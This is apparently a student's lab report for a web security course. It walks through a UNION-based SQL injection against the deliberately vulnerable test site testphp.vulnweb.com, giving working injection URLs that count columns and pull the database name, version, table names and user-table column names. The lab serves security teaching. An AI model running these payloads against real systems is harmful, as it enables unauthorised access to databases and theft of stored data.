Experiment - 4

Student Name:KRITI BHARAT UID:20BCS2055

Branch:CSE Section/Group:601/B
Subject:Web Mobile and Security Semester:5th

1. Aim: Design method to break authentication schemes(SQL injection attack).

2. Objective: SQL injection attack from command line (URL).

3. Software/Hardware Requirement: Windows 7 and above version

4. Tools to be used: SQLMAP

SQLMAP:

Introduction
SQLmap is an open-source tool used in penetration testing to detect and exploit
SQL injection flaws. SQLmap automates the process of detecting and exploiting
SQL injection. SQL Injection attacks can take control of databases that utilize
SQL. They can affect any website or web app that may have a SQL database
linked to it, such as MySQL, SQL Server, Oracle and many others. 

How and why is an sql injection attack performed?

 To perform an SQL injection attack, an attacker must locate a vulnerable input in a
web application or webpage. When an application or webpage contains a SQL
injection vulnerability, it uses user input in the form of an SQL query directly.

5. Steps/Method/Coding:
 Open given below targeted URL in the browser.
 Open the link- http://testphp.vulnweb.com/
 Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
  You'll inject the malicious code (cheat code)-
http://testphp.vulnweb.com/listproducts.php?cat=-1’
 Put the random number, cheat code -
http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11 clause to
check the row (tuple).
 Information gathering-
 To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,database( )--
 To check the database version ,Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,version()—
 Information to be fetch-
 Table name- cat=-1 union select
1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from
information_schema.tables where table_schema=database()--
 http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select
%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from
%20information_schema.tables%20where%20table_schema=database()--
 Column name- http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)
%20from%20information_schema.columns%20where
%20table_name=0x7573657273

6. Output/Screenshot:
1)homepage of acunetix

2)shows the product list

3) injecting the malicious code (cheat code)-

4) order by 11 clause to check the row (tuple).

5)To check the database name

6) To check the database version

7)showing the table name of database.

8)shows column name from database

7. Learning Outcomes:Learn about sql injection attack.